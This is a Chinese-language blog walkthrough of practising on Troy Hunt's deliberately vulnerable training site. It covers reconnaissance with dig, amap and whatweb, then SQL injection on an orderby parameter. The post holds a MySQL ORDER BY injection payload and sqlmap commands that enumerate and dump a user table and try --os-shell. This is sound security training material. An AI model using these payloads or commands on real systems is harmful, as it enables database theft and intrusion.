Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1790153
  • 博文数量: 297
  • 博客积分: 285
  • 博客等级: 二等列兵
  • 技术积分: 3006
  • 用 户 组: 普通用户
  • 注册时间: 2010-03-06 22:04
个人简介

Linuxer, ex IBMer. GNU https://hmchzb19.github.io/

文章分类

全部博文(297)

文章存档

2020年(11)

2019年(15)

2018年(43)

2017年(79)

2016年(79)

2015年(58)

2014年(1)

2013年(8)

2012年(3)

分类: 网络与安全

2017-11-20 15:57:54

这个网站上面有很多的OWASP10的缺陷,可以练习提高我们的技术水平.

1. 首先尝试下Amap, Amap 作为一个扫描工具,可以探测 Web Application 的Version.

点击(此处)折叠或打开

  1. https://tools.kali.org/information-gathering/amap
首先,我们来找出hackyourselffirst.troyhunt.com 的IP地址.

点击(此处)折叠或打开

  1.  dig @8.8.8.8 hackyourselffirst.troyhunt.com A

    ; <<>> DiG 9.10.3-P4-Debian <<>> @8.8.8.8 hackyourselffirst.troyhunt.com A
    ; (1 server found)
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6927
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1

    ;; OPT PSEUDOSECTION:
    ; EDNS: version: 0, flags:; udp: 512
    ;; QUESTION SECTION:
    ;hackyourselffirst.troyhunt.com.    IN    A

    ;; ANSWER SECTION:
    hackyourselffirst.troyhunt.com.    286 IN    CNAME    hackyourselffirst.azurewebsites.net.
    hackyourselffirst.azurewebsites.net. 3586 IN CNAME waws-prod-bay-003.vip.azurewebsites.windows.net.
    waws-prod-bay-003.vip.azurewebsites.windows.net. 286 IN    CNAME waws-prod-bay-003.cloudapp.net.
    waws-prod-bay-003.cloudapp.net.    46 IN    A    137.117.17.70

    ;; Query time: 52 msec
    ;; SERVER: 8.8.8.8#53(8.8.8.8)
    ;; WHEN: Mon Nov 20 14:59:53 CST 2017
    ;; MSG SIZE  rcvd: 223

IP地址是137.117.17.70 , 同时我们可以知道这个hackyourselffirst.troyhunt.com 有很多的别名(CNAME).
然后用Amap来探测下后台的Web application.

点击(此处)折叠或打开

  1. amap -bqv 137.117.17.70 80
  2. Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
  3. Using response file /etc/amap/appdefs.resp ... loaded 346 responses
  4. Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers

  5. amap v5.4 (www.thc.org/thc-amap) started at 2017-11-20 15:02:35 - APPLICATION MAPPING mode

  6. Total amount of tasks to perform in plain connect mode: 23
  7. Waiting for timeout on 23 connections ...
  8. Protocol on 137.117.17.70:80/tcp matches http - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>Microsoft Azure Web App - Error 404</titl
  9. Protocol on 137.117.17.70:80/tcp matches http-iis - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>Microsoft Azure Web App - Error 404</titl
  10. Protocol on 137.117.17.70:80/tcp matches http-apache-2 - banner: HTTP/1.1 400 Bad Request\r\nContent-Type text/html; charset=us-ascii\r\nServer Microsoft-HTTPAPI/2.0\r\nDate Mon, 20 Nov 2017 070234 GMT\r\nConnection close\r\nContent-Length 326\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"

结果并不明确,这个网站使用的可能是IIS 也可能是Apache .
Amap的结果不让人满意,接着尝试Whatweb scanner


2.  Whatweb 的网站 https://www.morningstarsecurity.com/research/whatweb
Whatweb的命令行参数看起来要多的多.

点击(此处)折叠或打开

  1. Usage: whatweb [options] <URLs>

  2. TARGET SELECTION:
  3.   <TARGETs>            Enter URLs, hostnames, IP adddresses, or
  4.                   nmap-format IP ranges.
  5.   --input-file=FILE, -i        Read targets from a file.

  6. AGGRESSION:
  7.   --aggression, -a=LEVEL    Set the aggression level. Default: 1.
  8.   1. Stealthy            Makes one HTTP request per target and also
  9.                   follows redirects.
  10.   3. Aggressive            If a level 1 plugin is matched, additional
  11.                   requests will be made.

  12. PLUGINS:
  13.   --list-plugins, -l        List all plugins.
  14.   --info-plugins, -I=[SEARCH]    List all plugins with detailed information.
  15.                 Optionally search with a keyword.
  16.   --search-plugins=STRING    Search plugins for a keyword.
  17.   --grep, -g=STRING        Search for STRING in HTTP responses. Reports
  18.                 with a plugin named Grep.
  19. OUTPUT:
  20.   --verbose, -v            Verbose output includes plugin descriptions.
  21.                 Use twice for debugging.
  22.   --colour,--color=WHEN        control whether colour is used. WHEN may be
  23.                 `never', `always', or `auto'.
  24.  
  25. HELP & MISCELLANEOUS:
  26.   --short-help            This short usage help.
  27.   --help, -h            Complete usage help.

  28. EXAMPLE USAGE:
  29. * Scan example.com.
  30.   ./whatweb example.com
  31. * Scan reddit.com slashdot.org with verbose plugin descriptions.
  32.   ./whatweb -v reddit.com slashdot.org
  33. * An aggressive scan of wired.com detects the exact version of WordPress.
  34.   ./whatweb -a 3 www.wired.com
  35. * Scan the local network quickly and suppress errors.
  36.   whatweb --no-errors 192.168.0.0/24
  37. * Scan the local network for HTTPS websites.
  38.   whatweb --no-errors --url-prefix https:// 192.168.0.0/24
  39. * Scan for crossdomain policies in the Alexa Top 1000.
  40.   ./whatweb -i plugin-development/alexa-top-100.txt \
  41.   --url-suffix /crossdomain.xml -p crossdomain_xml

  42.   Note: This is the short usage help.
  43.   For the complete usage help use -h or --help.
使用whatWeb来探测下,得到的信息要多的多.

点击(此处)折叠或打开

  1. whatweb -v hackyourselffirst.troyhunt.com
  2. WhatWeb report for http://hackyourselffirst.troyhunt.com
  3. Status : 200 OK
  4. Title : Supercar Showdown - Supercar Showdown
  5. IP : 137.117.17.70
  6. Country : UNITED STATES, US

  7. Summary : JQuery, ASP_NET[4.0.30319][MVC5.1], HttpOnly[ARRAffinity,ASP.NET_SessionId], Cookies[ARRAffinity,ASP.NET_SessionId,VisitStart], UncommonHeaders[x-aspnetmvc-version], HTML5, X-Powered-By[ASP.NET], X-XSS-Protection[0], Microsoft-IIS[8.0], Script[text/javascript], HTTPServer[Microsoft-IIS/8.0], Google-Analytics[Universal][UA-43629727-1]

  8. Detected Plugins:
  9. [ ASP_NET ]
  10.     ASP.NET is a free web framework that enables great Web
  11.     applications. Used by millions of developers, it runs some
  12.     of the biggest sites in the world.

  13.     Version : 4.0.30319 (from X-AspNet-Version HTTP header)
  14.     String : MVC5.1
  15.     Google Dorks: (2)
  16.     Website : http://www.asp.net/

  17. [ Cookies ]
  18.     Display the names of cookies in the HTTP headers. The
  19.     values are not returned to save on space.

  20.     String : ASP.NET_SessionId
  21.     String : VisitStart
  22.     String : ARRAffinity

  23. [ Google-Analytics ]
  24.     This plugin identifies the Google Analytics account.

  25.     Version : Universal
  26.     Account : UA-43629727-1
  27.     Website : http://www.google.com/analytics/

  28. [ HTML5 ]
  29.     HTML version 5, detected by the doctype declaration


  30. [ HTTPServer ]
  31.     HTTP server header string. This plugin also attempts to
  32.     identify the operating system from the server header.

  33.     String : Microsoft-IIS/8.0 (from server string)

  34. [ HttpOnly ]
  35.     If the HttpOnly flag is included in the HTTP set-cookie
  36.     response header and the browser supports it then the cookie
  37.     cannot be accessed through client side script - More Info:
  38.     http://en.wikipedia.org/wiki/HTTP_cookie

  39.     String : ARRAffinity,ASP.NET_SessionId

  40. [ JQuery ]
  41.     A fast, concise, JavaScript that simplifies how to traverse
  42.     HTML documents, handle events, perform animations, and add
  43.     AJAX.

  44.     Website : http://jquery.com/

  45. [ Microsoft-IIS ]
  46.     Microsoft Internet Information Services (IIS) for Windows
  47.     Server is a flexible, secure and easy-to-manage Web server
  48.     for hosting anything on the Web. From media streaming to
  49.     web application hosting, IIS's scalable and open
  50.     architecture is ready to handle the most demanding tasks.

  51.     Version : 8.0
  52.     Website : http://www.iis.net/

  53. [ Script ]
  54.     This plugin detects instances of script HTML elements and
  55.     returns the script language/type.

  56.     String : text/javascript

  57. [ UncommonHeaders ]
  58.     Uncommon HTTP server headers. The blacklist includes all
  59.     the standard headers and many non standard but common ones.
  60.     Interesting but fairly common headers should have their own
  61.     plugins, eg. x-powered-by, server and x-aspnet-version.
  62.     Info about headers can be found at www.http-stats.com

  63.     String : x-aspnetmvc-version (from headers)

  64. [ X-Powered-By ]
  65.     X-Powered-By HTTP header

  66.     String : ASP.NET (from x-powered-by string)

  67. [ X-XSS-Protection ]
  68.     This plugin retrieves the X-XSS-Protection value from the
  69.     HTTP header. - More Info:
  70.     http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
  71.     aspx

  72.     String : 0

  73. HTTP Headers:
  74.     HTTP/1.1 200 OK
  75.     Cache-Control: private
  76.     Content-Length: 3276
  77.     Content-Type: text/html; charset=utf-8
  78.     Content-Encoding: gzip
  79.     Vary: Accept-Encoding
  80.     Server: Microsoft-IIS/8.0
  81.     Set-Cookie: ASP.NET_SessionId=1ifarra5yyutpekgrkxcmcab; path=/; HttpOnly
  82.     Set-Cookie: VisitStart=11/20/2017 7:53:15 AM; path=/
  83.     X-XSS-Protection: 0
  84.     X-AspNetMvc-Version: 5.1
  85.     X-AspNet-Version: 4.0.30319
  86.     X-Powered-By: ASP.NET
  87.     Set-Cookie: ARRAffinity=a58b2af319235c59b570f5ff28442356c3b989ad5027b21b3d5cc5b39074afda;Path=/;HttpOnly;Domain=hackyourselffirst.troyhunt.com
  88.     Date: Mon, 20 Nov 2017 07:53:11 GMT
  89.     Connection: close

3. 使用sqlmap 来做sqlinjection .
URL:
这里因为是orderby ,所以payload 应该是 orderby 字句,遗憾的是我不会sqlserver orderby 的hack. 只能依赖sqlmap了,如果是mysql, 可以使用如下的sql语句来hack.

点击(此处)折叠或打开

  1. select id from news where id=1 order by 1,(select case when(1=2) then 1 else 1* (select table_name from information_schema.tables)end)=1;
sqlmap是个很强大的武器,经过我的实验,以下都能使用.其中dump数据的最后一个语句要跑4,5分钟的样子。

点击(此处)折叠或打开

  1. sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dbs
  2. sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-user
  3. sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-db
  4. sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --tables -D 'hackyourselffirst_db'
  5. sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --column -T UserProfile -D 'hackyourselffirst_db'
  6. sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dump -T UserProfile -D 'hackyourselffirst_db
唯独--os-shell 的语句并不成功.

点击(此处)折叠或打开

  1. sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --os-shell
不过我已经很满足了,sqlmap 是个很强大的自动化sqlinjection 工具。一个人不见得能掌握所有的可以hack的sql 字句,sqlmap这时候起到了很关键的作用。

阅读(1362) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~